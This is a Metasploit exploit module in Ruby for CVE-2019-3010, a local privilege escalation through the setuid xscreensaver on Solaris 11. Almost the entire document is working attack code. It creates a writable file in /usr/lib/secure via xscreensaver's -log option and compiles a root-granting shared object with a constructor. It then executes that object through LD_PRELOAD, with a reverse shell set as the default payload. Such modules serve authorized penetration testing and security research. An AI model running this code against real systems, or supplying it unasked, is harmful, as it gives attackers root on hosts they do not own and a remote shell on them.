Solaris xscreensaver Privilege Escalation

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Solaris::Priv  
include Msf::Post::Solaris::System  
include Msf::Post::Solaris::Kernel  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Solaris xscreensaver log Privilege Escalation',  
'Description' => %q{  
This module exploits a vulnerability in `xscreensaver` versions  
since 5.06 on unpatched Solaris 11 systems which allows users  
to gain root privileges.  
  
`xscreensaver` allows users to create a user-owned file at any  
location on the filesystem using the `-log` command line argument  
introduced in version 5.06.  
  
This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,  
overwrites the log file with a shared object, and executes the shared  
object using the `LD_PRELOAD` environment variable.  
  
This module has been tested successfully on:  
  
xscreensaver version 5.15 on Solaris 11.1 (x86); and  
xscreensaver version 5.15 on Solaris 11.3 (x86).  
},  
'References' =>  
[  
['CVE', '2019-3010'],  
['EDB', '47509'],  
['URL', 'https://seclists.org/fulldisclosure/2019/Oct/39'],  
['URL', 'https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver'],  
['URL', 'https://techblog.mediaservice.net/2019/10/local-privilege-escalation-on-solaris-11-x-via-xscreensaver/'],  
['URL', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html']  
],  
'Notes' => { 'AKA' => ['raptor_xscreensaver'] },  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Marco Ivaldi', # Discovery and exploit  
'bcoles' # Metasploit  
],  
'DisclosureDate' => '2019-10-16',  
'Privileged' => true,  
'Platform' => ['solaris', 'unix'],  
'Arch' => [ARCH_CMD],  
'Targets' => [['Auto', {}]],  
'SessionTypes' => ['shell', 'meterpreter'],  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'cmd/unix/reverse_ksh',  
'WfsDelay' => 10,  
'PrependFork' => true  
},  
'DefaultTarget' => 0))  
register_options [  
OptString.new('XSCREENSAVER_PATH', [true, 'Path to xscreensaver executable', '/usr/bin/xscreensaver']),  
OptString.new('XORG_PATH', [true, 'Path to Xorg executable', '/usr/bin/Xorg'])  
]  
register_advanced_options [  
OptString.new('Xdisplay', [true, 'Display to use if starting a new Xorg session', ':1']),  
OptBool.new('ForceExploit', [false, 'Override check result', false]),  
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])  
]  
end  
  
def xscreensaver_path  
datastore['XSCREENSAVER_PATH']  
end  
  
def xorg_path  
datastore['XORG_PATH']  
end  
  
def mkdir(path)  
vprint_status "Creating directory '#{path}'"  
cmd_exec "mkdir -p '#{path}'"  
register_dir_for_cleanup path  
end  
  
def upload(path, data)  
print_status "Writing '#{path}' (#{data.size} bytes) ..."  
rm_f path  
write_file path, data  
register_file_for_cleanup path  
end  
  
def upload_and_compile(path, data)  
upload "#{path}.c", data  
  
output = cmd_exec "PATH=\"$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin\" gcc -fPIC -shared -s -g -O2 -lc -o #{path} #{path}.c"  
unless output.blank?  
print_error output  
fail_with Failure::Unknown, "#{path}.c failed to compile"  
end  
  
register_file_for_cleanup path  
end  
  
def check  
unless setuid? xscreensaver_path  
vprint_error "#{xscreensaver_path} is not setuid"  
return CheckCode::Safe  
end  
vprint_good "#{xscreensaver_path} is setuid"  
  
unless has_gcc?  
vprint_error 'gcc is not installed'  
return CheckCode::Safe  
end  
vprint_good 'gcc is installed'  
  
xscreensaver_version = cmd_exec("#{xscreensaver_path} --help").to_s.scan(/^xscreensaver ([\d\.]+)/).flatten.first  
if xscreensaver_version.to_s.eql? ''  
vprint_error 'Could not determine xscreensaver version'  
return CheckCode::Detected  
end  
  
# Bug introduced in version 5.06. Patched in version <~ 5.42.  
unless Gem::Version.new(xscreensaver_version).between?(Gem::Version.new('5.06'), Gem::Version.new('5.41'))  
vprint_error "xscreensaver version #{xscreensaver_version} is not vulnerable"  
return CheckCode::Safe  
end  
vprint_good "xscreensaver version #{xscreensaver_version} appears to be vulnerable"  
  
CheckCode::Appears  
end  
  
def exploit  
if is_root?  
fail_with Failure::BadConfig, 'Session already has root privileges'  
end  
  
unless [CheckCode::Detected, CheckCode::Appears].include? check  
unless datastore['ForceExploit']  
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'  
end  
print_warning 'Target does not appear to be vulnerable'  
end  
  
unless writable? datastore['WritableDir']  
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"  
end  
  
# Set display  
display = cmd_exec 'echo $DISPLAY'  
kill_xorg = false  
  
if display.to_s.blank?  
display = datastore['Xdisplay']  
print_status "Starting Xorg on display #{display} ..."  
cmd_exec "#{xorg_path} #{display} & echo "  
kill_xorg = true  
else  
print_status "Using Xorg display #{display} ..."  
end  
  
# Create writable log file in /usr/lib/secure/  
lib_name = rand_text_alphanumeric 5..10  
if cmd_exec("/usr/bin/file #{xscreensaver_path}").to_s.include? 'ELF 64-bit'  
secure_path = "/usr/lib/secure/64/"  
else  
secure_path = "/usr/lib/secure/"  
end  
lib_path = "#{secure_path}#{lib_name}.so"  
  
print_status "Creating log file #{lib_path} ..."  
cmd_exec "umask 0; DISPLAY=#{display} #{xscreensaver_path} -display #{display} -log #{lib_path} & echo "  
  
Rex.sleep(5)  
  
cmd_exec 'pkill -U `whoami` -n xscreensaver'  
if kill_xorg  
cmd_exec 'pkill -U `whoami` -n Xorg'  
end  
  
unless writable? lib_path  
fail_with Failure::NotVulnerable, "Could not create writable log file #{lib_path}"  
end  
  
register_file_for_cleanup lib_path  
  
# Upload and compile shared object  
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"  
mkdir base_path  
  
payload_name = ".#{rand_text_alphanumeric 5..10}"  
payload_path = "#{base_path}/#{payload_name}"  
  
so = <<-EOF  
#include <unistd.h>  
void __attribute__((constructor)) cons() {  
setuid(0);  
setgid(0);  
unlink("#{lib_path}");  
execle("#{payload_path}", "", NULL, NULL);  
_exit(0);  
}  
EOF  
  
so_name = ".#{rand_text_alphanumeric 5..10}"  
so_path = "#{base_path}/#{so_name}"  
upload_and_compile so_path, so  
  
# Overwrite newly created log file with compiled shared object  
vprint_status "Writing shared object to #{lib_path}"  
cmd_exec "cp '#{so_path}' '#{lib_path}'"  
  
# Upload and execute payload  
if payload.arch.first.to_s == 'cmd'  
upload payload_path, "#!/bin/sh\n#{payload.encoded}"  
else  
upload payload_path, generate_payload_exe  
end  
chmod payload_path  
  
print_status 'Executing payload...'  
cmd_exec "LD_PRELOAD=#{lib_path} #{xscreensaver_path} --help & echo "  
end  
end  
`